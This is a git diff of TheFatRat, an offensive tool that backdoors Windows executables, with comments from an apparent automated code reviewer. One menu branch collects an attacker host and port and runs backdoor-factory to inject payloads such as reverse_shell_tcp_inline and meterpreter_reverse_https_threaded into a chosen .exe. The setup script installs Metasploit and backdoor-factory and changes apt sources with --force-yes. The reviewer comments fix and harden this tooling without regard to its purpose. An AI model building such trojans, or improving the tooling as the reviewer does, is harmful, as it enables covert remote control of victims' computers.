@@ -4033,34 +5110,47 @@ echo elif test $fatrat == '4' then - echo "" - spinlong - echo -e $okegreen"" - echo -e $yellow " Your local IP address is : $lanip" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira; - embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file"); - payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1 - spinlong - if [ ! -f "$embed" ];then - echo -e $red "You did not setected any executable file" - read -ne " Press any key to return to menu ." - menu - fi - echo "" - echo "" - gboor - spinlong2 - echo "" - echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe - echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue" - read bebeku - clear - menu - + echo "" + spinlong + echo -e $okegreen"" + echo -e $yellow " Your local IPV4 address is : $lanip" + echo -e $yellow " Your local IPV6 address is : $lanip6" + echo -e $yellow " Your public IP address is : $publicip" + echo -e $yellow " Your Hostname is : $hostn" + echo -e $okegreen"" +if [ ! 
-f "$defcon" ] +then +yourip="" +yourport="" +fi + if [ -z "$yourip" ]; then + read -p ' Set LHOST IP: ' yourip + fi + echo -e $okegreen "" + if [ -z "$yourport" ]; then + read -p ' Set LPORT: ' yourport + fi + read -p ' Please enter the base name for output files : ' fira +invalid +if [ $err == "1" ] +then +echo -e $okegreen "" +echo -n "Press [ENTER] key to return to menu ." +read inp +menu +fi +selexe + pldbkf + echo "" + gboor + spinlong2 + echo "" + echo -e $okegreen"" + $backdoor -f $exef -s $payload -H $yourip -P $yourport -o output/$fira.exe + echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press [ENTER] key to continue" + read bebeku + clear + menu elif test $fatrat == '5' then embedapk @@ -4156,7 +5246,7 @@ menu cd .. cd .. echo "" - echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu." + echo -ne $red" [*] $cyan Folders cleaned, press [ENTER] key to return to the main menu." read anjeng menu @@ -4184,4 +5274,4 @@ menu clear menu -fi +fi \ No newline at end of file diff --git a/powerfull.sh b/powerfull.sh old mode 100644 new mode 100755 index e94bfc9..fa7dbe1 --- a/powerfull.sh +++ b/powerfull.sh @@ -43,6 +43,7 @@ echo -e $okegreen "" #get user local ip , public ip & hostname into variables lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` +lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'` publicip=`dig +short myip.opendns.com @resolver1.opendns.com` hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'` @@ -129,7 +130,8 @@ echo -e $okegreen"" #input lhost and lport echo -e $okegreen"" -echo -e $yellow "Your local IP address is : $lanip" +echo -e $yellow "Your local IPV4 address is : $lanip" +echo -e $yellow "Your local IPV6 address is : $lanip6" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" diff --git a/setup.sh b/setup.sh index 82c2c73..03ada97 100644 --- a/setup.sh 
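Review bot: The new `lanip6` line in the powerfull.sh `@@ -43,6 +43,7 @@` hunk picks the fourth line after `state UP` and prints its second field, which is an IPv6 address only by coincidence of `ip addr` layout; on an interface without an IPv4 address, or with an extra inet line, it yields `forever` or a second IPv4 address. Select by content instead, e.g. `lanip6=$(ip -6 addr show scope global 2>/dev/null | awk '/inet6/{print $2; exit}' | cut -d/ -f1)`. The existing `lanip` line has the same positional fragility but is not part of this change.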
+++ b/setup.sh 
@@ -1,215 +1,358 @@ #!/bin/bash -# setup.sh Original Author : Edo maland ( Screetsec ) -# Script rebuilded by peterpt -# Install all dependencies nedded -# configuration all file for fixing all problems -# -------------------------------------------------------- +function ssplt() { - -#Fail safe for original user sources.list in case setup was interrupted in middle last time -file="/etc/apt/sources.list.fatrat" +# check if searchsploit exists +clear +which searchsploit > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Searchsploit......................[ found ]" +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 +sleep 1 +else +echo -e $red "[ X ] searchsploit -> not found" +echo "" +echo -e $okegreen "Select one of the options bellow" +echo -e $orange "+-------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Searchsploit Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Searchsploit from Kali Repository$orange |" +echo -e $orange "+-------------------------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read q1 +case $q1 in + +1) +echo "" +echo -e $green "Enter The Path of your Searchsploit instalation" +echo -e $cyan "ex : /opt/searchsploit/searchsploit" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +sspd="$msp" +if [ ! -f $sspd ] +then +echo "" +echo -e $red "It was not possible to found searchsploit executable in : $sspd" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $okegreen "Press [ENTER] key to try again ." +read cont +ssplt +fi +echo "bash $sspd" | tee -a $config $log > /dev/null 2>&1 +chk="$path/logs/check" if [ -f "$file" ] then -echo "Setup Detected that your previous run was interrupted in middle , fixing your original repositories list ." 
-sleep 4s -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.fatrat /etc/apt/sources.list -echo "Your Original repository list was recovered. ;) ..... beginning setup" -echo "" -echo "Cleaning previous repositories cache & updating your repository ." -sudo apt-get clean && apt-get update -y -sleep 3s -else -echo "" -fi -path=`pwd` -arch=`uname -m` -log=$path/logs/setup.log -config=$path/config/config.path - -#Removing any previous setup log created -rm -f $log > /dev/null 2>&1 - -#This colour -cyan='\e[0;36m' -green='\e[0;32m' -lightgreen='\e[1;32m' -white='\e[1;37m' -red='\e[1;31m' -yellow='\e[1;33m' -blue='\e[1;34m' -purple='\e[1;35m' -path=`pwd` - -#Check root dulu -if [ $(id -u) != "0" ]; then -echo -e $red [x]::[not root]: You need to be [root] to run this script.; - echo "" - sleep 1 -exit 0 -fi -resize -s 80 103 > /dev/null 2>&1 +ct=`sed -n 1p $chk` +if [ "$ct" == "0" ]; then clear - -#Banner dong biar keren -echo -e $green "" -echo "___________ __ __________ __ " -echo "\_ _____/_____ _/ |_\______ \_____ _/ |_ " -echo " | __) \__ \ \ __\| _/\__ \ \ __\ " -echo " | \ / __ \_| | | | \ / __ \_| | " -echo " \___ / (____ /|__| |____|_ /(____ /|__| " -echo " \/ \/ \/ \/ " -echo " ____ ________ " -echo " /_ | / __ \ " -echo " | | \____ / " -echo " | | / / " -echo " |___| /\ /____/ " -echo " \/ " +echo -e $red "Fatrat was not able to install some packages" echo "" -echo -e $blue " Setup Script for FATRAT 1.9 " -touch $log -echo "------------------------------------------------------" >> $log -echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log -echo "------------------------------------------------------" >> $log -echo " " >> $log +echo -e $blue "Reactivating you original repositories" +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.backup /etc/apt/sources.list +#now we can remove the emergency backup securely +rm -f /etc/apt/sources.list.fatrat +apt-get clean +xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " 
+clear +echo -e $okegreen "Starting diagnostics" +chmod +x diag.sh +#./diag.sh +exit +elif [ "$ct" == "1" ]; then echo "" -echo -e $green "Checking for internet connection" -sleep 2 -ping -c 1 google.com > /dev/null 2>&1 - if [ "$?" != 0 ] - -then - - echo -e $red " You are not connected to the Internet" - echo -e $red " This script requires an active Internet connection" - echo -e $green "" - echo -e $green "Press any key to continue" - read abor - exit 0 - -else - echo -e $green "Internet connection detected !!" - echo "" - sleep 1 fi -case $arch in -x86_64|aarch64) -echo -e $purple " 64Bit OS detected" -echo "" +else +echo -e $okegreen "Something went very wrong , execute ./setup.sh again" +fi ;; -i386|i486|i586|i686|armv7l) -echo -e $blue " 32Bit OS detected" + +#ok +2) +echo -e $yellow "[ ! ] Installing Searchsploit " +xterm -T "☣ INSTALL SEARCHSPLOIT ☣" -geometry 100x30 -e "sudo apt-get install exploitdb --force-yes -y" +echo "searchsploit" | tee -a $config $log > /dev/null 2>&1 +sleep 1 echo "" +chk="$path/logs/check" +if [ -f "$file" ] +then +ct=`sed -n 1p $chk` +if [ "$ct" == "0" ]; then +clear +echo -e $red "Fatrat was not able to install some packages" +echo "" +echo -e $blue "Reactivating you original repositories" +rm -f /etc/apt/sources.list +mv /etc/apt/sources.list.backup /etc/apt/sources.list +#now we can remove the emergency backup securely +rm -f /etc/apt/sources.list.fatrat +apt-get clean +xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " +clear +echo -e $okegreen "Starting diagnostics" +chmod +x diag.sh +#./diag.sh +exit +elif [ "$ct" == "1" ]; then +echo "" +fi +else +echo -e $okegreen "Something went very wrong , execute ./setup.sh again" +fi ;; + *) -echo -e $red "Setup will not proceed because none of these archs were detected" -echo "" -echo -e $blue "x86_64|i386|i486|i586|i686|aarch64|armv7l" -echo "" -echo -e $green "Report this arch: $blue $arch $green into fatrat issues on github" -echo "" -echo -e "Press any 
key to continue" -read abor -exit 0 +ssplt ;; esac +fi +} +#ok +function bkf() { +clear +# Check if backdoor-factory exists + +which backdoor-factory > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Backdoor-Factory..................[ found ]" +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 +sleep 1 +ssplt +else +echo -e $red "[ X ] backdoor-factory -> not found " +echo "" + +echo "" +echo -e $green "Select one of the options bellow" +echo -e $orange "+-----------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Backdoor-Factory Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Backdoor-Factory from Kali Repository$orange |" +echo -e $orange "+-----------------------------------------------------+" +echo "" +echo -ne $green "Option : ";tput sgr0 +read q2 +case $q2 in + +1) +echo "" +echo -e $green "Enter The Path of your backdoor-factory instalation" +echo -e $cyan "ex : /opt/backdoor-factory/backdoor.py" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +bkdf=$msp +if [ ! -f $bkdf ] +then +echo "" +echo -e $red "It was not possible to found backdoor-factory executable in : $bkdf" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." +read cont +bkf +fi +echo "python2 $bkdf" | tee -a $config $log > /dev/null 2>&1 +ssplt +;; + +2) +echo -e $yellow "[ ! ] Installing backdoor-factory " +xterm -T "☣ INSTALL BACKDOOR-FACTORY ☣" -geometry 100x30 -e "sudo apt-get install backdoor-factory --force-yes -y" +echo -e $green "[ ✔ ] Done installing ...." +echo "backdoor-factory" | tee -a $config $log > /dev/null 2>&1 +ssplt +;; + +*) +bkf +;; +esac +fi +} +#ok +function mtspl() { +clear +# check if metasploit-framework its installed +which msfconsole > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +echo -e $green "[ ✔ ] Metasploit-Framework..............[ found ]" +echo "msfconsole" | tee -a $config $log >> /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log >> /dev/null 2>&1 +sleep 1 +bkf +else +echo -e $red "[ X ] metasploit-framework -> not found " + +# Providing manual input to user in case metasploit was installed from git and is not on system path + +echo "" +echo -e $okegreen "Select one of the options bellow" +echo -e $orange "+---------------------------------------------------------+" +echo -e $orange "|$white [$okegreen 1$white ]$yellow Setup Metasploit Framework Path Manually$orange |" +echo -e $orange "|$white [$okegreen 2$white ]$yellow Install Metasploit Framework from Kali Repository$orange |" +echo -e $orange "+---------------------------------------------------------+" +echo "" +echo -ne $okegreen "Option : ";tput sgr0 +read q3 +case $q3 in +1) +echo "" +echo -e $green "Enter The Path of your metasploit instalation" +echo -e $cyan "ex : /opt/metasploit-framework" +echo "" +echo -ne $green "PATH : ";tput sgr0 +read msp +msfc=$msp/msfconsole +msfv=$msp/msfvenom +if [ ! -f $msfc ] +then +echo "" +echo -e $red "It was not possible to found msfconsole in : $msfc" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." +read cont +mtspl +fi +if [ ! -f $msfv ] +then +echo "" +echo -e $red "It was not possible to found msfvenom in : $msfv" +echo "" +echo -e $green "Make sure you write the right path of your instalation" +echo "" +echo -e $green "Press [ENTER] key to try again ." 
+read cont +mtspl +fi +#Creation of symlinks to metasploit manual path in /usr/local/sbin to avoid changes in fatrat scripts + +unlink /usr/local/sbin/msfconsole > /dev/null 2>&1 +unlink /usr/local/sbin/msfvenom > /dev/null 2>&1 +ln -s $msfc /usr/local/sbin/msfconsole > /dev/null 2>&1 +ln -s $msfv/msfvenom /usr/local/sbin/msfvenom > /dev/null 2>&1 +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 +bkf +;; + +2) +echo -e $yellow "[ ! ] Installing Metasploit-Framework " +xterm -T "☣ INSTALL METASPLOIT-FRAMEWORK ☣" -geometry 100x30 -e "sudo apt-get install metasploit-framework --force-yes -y" +echo -e $green "[ ✔ ] Done installing ...." +echo "msfconsole" | tee -a $config $log > /dev/null 2>&1 +echo "msfvenom" | tee -a $config $log > /dev/null 2>&1 +bkf +;; +*) +mtspl +;; +esac +fi +} + + +function cont() { + +stp="logs/check" +rm -rf $stp >/dev/null 2>&1 +touch $stp +echo "1" > $stp + #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Xterm.............................[ found ]" which xterm >> $log 2>&1 -sleep 2 else echo "" echo -e $red "[ X ] xterm -> not found! " -sleep 2 echo -e $yellow "[ ! ] Installing Xterm " -sleep 2 echo -e $green "" sudo apt-get install xterm -y -clear -echo -e $green "[ ✔ ] Done installing .... " which xterm >> $log 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Xterm -> OK" +else +echo "0" > $stp +fi fi +sleep 1 #check if dig its installed which dig > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Dns-Utils ........................[ found ]" which dig >> $log 2>&1 -sleep 2 else -echo "" echo -e $red "[ X ] dnsutils -> not found! " -sleep 2 echo -e $yellow "[ ! ] Installing dnsutils" xterm -T "☣ INSTALL DNSUTILS ☣" -geometry 100x30 -e "sudo apt-get install dnsutils -y" -echo -e $green "[ ✔ ] Done installing .... 
" which dig >> $log 2>&1 -fi - -#check if zenity its installed -which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Zenity............................[ found ]" -which zenity >> $log 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Dns-Utils -> OK" else -echo "" -echo -e $red "[ X ] zenity -> not found! " -sleep 2 -echo -e $yellow "[ ! ] Installing zenity " -xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" -echo -e $green "[ ✔ ] Done installing .... " -which zenity >> $log 2>&1 +echo "0" > $stp fi - +fi +sleep 1 # check if gcc exists which gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Gcc compiler......................[ found ]" which gcc >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] gcc compiler -> not found " echo -e $yellow "[ ! ] Installing gcc " xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" -echo -e $green "[ ✔ ] Done installing .... " which gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] GCC -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 # check if monodevelop exists which monodevelop > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Monodevelop ......................[ found ]" which monodevelop >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Monodevelop -> not found " echo -e $yellow "[ ! ] Installing monodevelop " xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" -echo -e $green "[ ✔ ] Done installing ...." which monodevelop >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Monodevelop -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #check if apache2 exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Apache2 ..........................[ found ]" which apache2 >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Apache2 -> not found " echo -e $yellow "[ ! 
] Installing apache2 " xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" -echo -e $green "[ ✔ ] Done installing ...." which apache2 >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Apache2 -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #check if gnome terminal exists #added this new install option because user may be running a distro that may not have gnome terminal installed by default #gnome terminal is used in main script to run searchsploit 
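Review bot: In `ssplt` the repository-restore path runs `rm -f /etc/apt/sources.list` before `mv /etc/apt/sources.list.backup /etc/apt/sources.list`, so if the backup is missing the machine is left with no apt sources at all; `mv -f` alone overwrites the target, or guard it with `[ -f /etc/apt/sources.list.backup ] && mv -f /etc/apt/sources.list.backup /etc/apt/sources.list`. In `mtspl` option 1, `msfv` is already `$msp/msfvenom`, so `ln -s $msfv/msfvenom /usr/local/sbin/msfvenom` creates a dangling symlink; use `ln -s "$msfv" /usr/local/sbin/msfvenom` as the msfconsole line does. The three `apt-get install ... --force-yes -y` calls disable apt's package authentication, which a signed repository does not need; drop `--force-yes`. In `ssplt`, `bkf` and `mtspl` the bad-path branches call the function again and then fall through and still append the rejected path to `$config`, so add `return` after each recursive call. `file`, `path`, `log` and `config` are no longer assigned anywhere in this hunk; if they are not set before `cont` is invoked, `[ -f "$file" ]` is always false and the restore branch never runs.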
@@ -217,68 +360,74 @@ which gnome-terminal > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Gnome Terminal....................[ found ]" which gnome-terminal >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Gnome-terminal-> not found " echo -e $yellow "[ ! ] Installing gnome-terminal " xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" -echo -e $green "[ ✔ ] Done installing ...." which gnome-terminal >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Gnome Terminal -> OK" +else +echo "0" > $stp +fi fi #Checking if upx compressor exists +sleep 1 which upx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] UPX Compressor....................[ found ]" which upx >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Upx compressor -> not found " echo -e $yellow "[ ! ] Installing upx-compressor " xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" -echo -e $green "[ ✔ ] Done installing ...." which upx >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] UPX Compressor -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #Checking if Ruby exists which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Ruby..............................[ found ]" which ruby >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Ruby -> not found " echo -e $yellow "[ ! ] Installing Ruby " -xterm -T "☣ INSTALL Ruby ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" -echo -e $green "[ ✔ ] Done installing ...." +xterm -T "☣ INSTALL Ruby ☣" -geometry 100x30 -e "sudo apt-get install ruby -y && gem install nokogiri" which ruby >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Ruby -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #Checking if Openssl exists which openssl > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then echo -e $green "[ ✔ ] Openssl...........................[ found ]" which openssl >> $log 2>&1 -sleep 2 else echo -e $red "[ X ] Openssl -> not found " echo -e $yellow "[ ! ] Installing Openssl " xterm -T "☣ INSTALL OPENSSL ☣" -geometry 100x30 -e "sudo apt-get install openssl -y" -echo -e $green "[ ✔ ] Done installing ...." which openssl >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Openssl -> OK" +else +echo "0" > $stp fi - +fi +sleep 1 #installing dependencies for ruby script -echo -e $green "[ ! ] Installing dedendencies for ruby script" -xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick -y" -echo -e $green "[ ✔ ] Done installing ...." -sleep 2 - -xterm -T "☣ INSTALL APKCREATION DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install lib32z1 lib32ncurses5 lib32stdc++6 -y" +echo -e $green "[ ! ] Installing tools dependencies" +xterm -T "☣ INSTALL DEPENDENCIES ☣" -geometry 100x30 -e "sudo apt-get install zlib1g-dev libmagickwand-dev imagemagick lib32z1 lib32ncurses5 lib32stdc++6 -y" +sleep 1 ################################# #inputrepo @@ -300,9 +449,9 @@ echo 'deb http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sourc echo 'deb-src http://old.kali.org/kali sana main non-free contrib' >> /etc/apt/sources.list echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list -sleep 2 xterm -T "☣ UPDATING KALI REPO ☣" -geometry 100x30 -e "sudo apt-get update" >>$log 2>&1 +sleep 1 #Checking if Jarsigner exists which jarsigner > /dev/null 2>&1 if [ "$?" -eq "0" ]; then 
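Review bot: Every new failure branch in this hunk (gnome-terminal, upx, ruby, openssl) records the failure with `echo "0" > $stp`, but `stp` is not among the variables the setup preamble assigns later in this diff (`path`, `arch`, `log`, `config`, `fail`, `cfg`), and the expansion is unquoted; if it is unset when this runs, bash reports an ambiguous redirect and the failure marker is silently lost. Writing it as `echo "0" > "${stp:?stp not set}"` makes the assumption explicit and fails loudly instead; the same pattern recurs in the jarsigner, unzip/keytool, mingw, dx/aapt/apktool and dex2jar hunks below. In the Ruby branch, `gem install nokogiri` now runs as root inside the xterm, unpinned and with its exit status discarded, while the only post-install check is `which ruby`, so a failed gem fetch still prints `Ruby -> OK`; adding `gem list -i nokogiri >/dev/null` to the check covers it, and pinning a version keeps the root install reproducible.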
@@ -316,12 +465,13 @@ echo "** Configuration Paths for TheFatRat , do not delete anything from this fi echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config echo "********************************************************************************************************" >> $config echo "jarsigner" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Jarsigner (java) -> not found " echo -e $yellow "[ ! ] Installing Java " xterm -T "☣ INSTALL OPENJDK-8 ☣" -geometry 100x30 -e "sudo apt-get install openjdk-8-jdk openjdk-8-jre --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." +which jarsigner > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Jarsigner -> OK" which jarsigner >> $log 2>&1 rm -f $config #Creating new config file @@ -331,8 +481,11 @@ echo "** Configuration Paths for TheFatRat , do not delete anything from this fi echo "** if you need to reconfig your tools path , then run ./setup.sh in (TheFatRat directory) . **" >> $config echo "********************************************************************************************************" >> $config echo "jarsigner" | tee -a $config >> /dev/null 2>&1 -sleep 2 +else +echo "0" > $stp fi +fi +sleep 1 #Checking if Unzip exists which unzip > /dev/null 2>&1 
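Review bot: The new post-install check only confirms that some `jarsigner` is on PATH; it says nothing about where it came from, and the install line it guards still passes `--force-yes`, which lets apt proceed with unauthenticated packages. Since this commit is reworking the verification here, the install line is the place to drop it: `xterm -T "☣ INSTALL OPENJDK-8 ☣" -geometry 100x30 -e "sudo apt-get install openjdk-8-jdk openjdk-8-jre -y "`. The same flag remains on the unzip, keytool and mingw install lines in the hunks that follow. The `if` opened after the install here is only closed in the next hunk, after the `rm -f $config` / config re-creation block.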
@@ -340,91 +493,71 @@ if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Unzip.............................[ found ]" which unzip >> $log 2>&1 echo "unzip" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Unzip -> not found " echo -e $yellow "[ ! ] Installing Unzip " xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." which unzip >> $log 2>&1 +if [ "$?" -eq "0" ]; then echo "unzip" | tee -a $config >> /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Unzip -> OK" +else +echo "0" > $stp +fi fi +sleep 1 #Checking if keytool exists which keytool > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo -e $green "[ ✔ ] Keytool (java)....................[ found ]" which keytool >> $log 2>&1 echo "keytool" | tee -a $config >> /dev/null 2>&1 -sleep 2 else echo -e $red "[ X ] Keytool (java) -> not found " echo -e $yellow "[ ! ] Installing Java " xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install openjdk-8-jdk --force-yes -y " -echo -e $green "[ ✔ ] Done installing ...." which keytool >> $log 2>&1 +if [ "$?" -eq "0" ]; then echo "keytool" | tee -a $config >> /dev/null 2>&1 -sleep 2 +echo -e $green "[ ✔ ] Keytool -> OK" +else +echo "0" > $stp fi +fi + +sleep 1 #Adding zipalign path to config echo -e $green "[ ✔ ] Zipalign " echo "$path/tools/android-sdk/zipalign" >> $log 2>&1 echo "$path/tools/android-sdk/zipalign" | tee -a $config >> /dev/null 2>&1 -sleep 2 +sleep 1 #Adding Proguard path to config echo -e $green "[ ✔ ] Proguard " echo "$path/tools/proguard5.3.2/lib/proguard" >> $log 2>&1 echo "$path/tools/proguard5.3.2/lib/proguard" | tee -a $config >> /dev/null 2>&1 -sleep 2 +sleep 1 # check if mingw32 or mingw-64 exists case "$arch" in x86_64|aarch64) which i686-w64-mingw32-gcc > /dev/null 2>&1 if [ "$?" 
-eq "0" ]; then -echo -e $green "[ ✔ ] Mingw-w64 Compiler..................[ found ]" +echo -e $green "[ ✔ ] Mingw-w64 Compiler................[ found ]" which i686-w64-mingw32-gcc >> $log 2>&1 -sleep 2 +sleep 1 else echo -e $red "[ X ] mingw-w64 compiler -> not found " echo -e $yellow "[ ! ] Installing Mingw-64 " xterm -T "☣ INSTALL MINGW64 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw-w64 --force-yes -y" -which i686-w64-mingw32-gcc > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then -echo -e $green "[ ✔ ] Done installing .... " which i686-w64-mingw32-gcc >> $log 2>&1 -sleep 2 +if [ "$?" -eq "0" ]; then +echo -e $green "[ ✔ ] Mingw64 -> OK" else -echo -e $red "It was not possible to detect i686-w64-mingw32-gcc installed in your system ." -echo -e $yellow "One of these problems occured :" -echo "" -echo -e $blue "- Instalation from kali repository on your system failed" -echo "" -echo -e $blue "- You have a faulty installation of mingw-w64 in your system -(try : $green apt-get remove --purge mingw-w64 mingw32 -y && apt-get install -f -$blue and run setup again in fatrat folder ." -echo "" -echo -e $blue "- Your system is 64bit and you recently added into dpkg arch:i386 for some reason" -echo "" -echo -e $blue "- /usr/bin folder is not on your system path (not likely)" -echo "" -echo -e $yellow "Please report into issues on Fatrat github this error : ($arch)" -echo "" -echo -e $green "Press any key to continue" -read abo -echo -e $blue "Reactivating you original repositories" -rm -f /etc/apt/sources.list -mv /etc/apt/sources.list.backup /etc/apt/sources.list -#now we can remove the emergency backup securely -rm -f /etc/apt/sources.list.fatrat -apt-get clean -xterm -T "☣ UPDATE YOUR REPO ☣" -geometry 100x30 -e "sudo apt-get update " -clear -exit 0 +echo "0" > $stp fi fi ;; 
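Review bot: The mingw-w64 failure branch now writes `echo "0" > $stp` and falls through, where the removed code restored `/etc/apt/sources.list` from its backup and exited; whether the repository entries setup appended earlier are still reverted now depends on the later "rebackyo repo" section always being reached, which cannot be confirmed from this hunk. If anything between here and that section can exit early, the host is left with the extra Kali entries in its sources list. A one-line comment at the `echo "0" > $stp` site would make the contract explicit, e.g. `# failure is only recorded here; sources.list is restored in the rebackyo section`. The mingw32 hunk that follows makes the identical change and would take the same comment.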
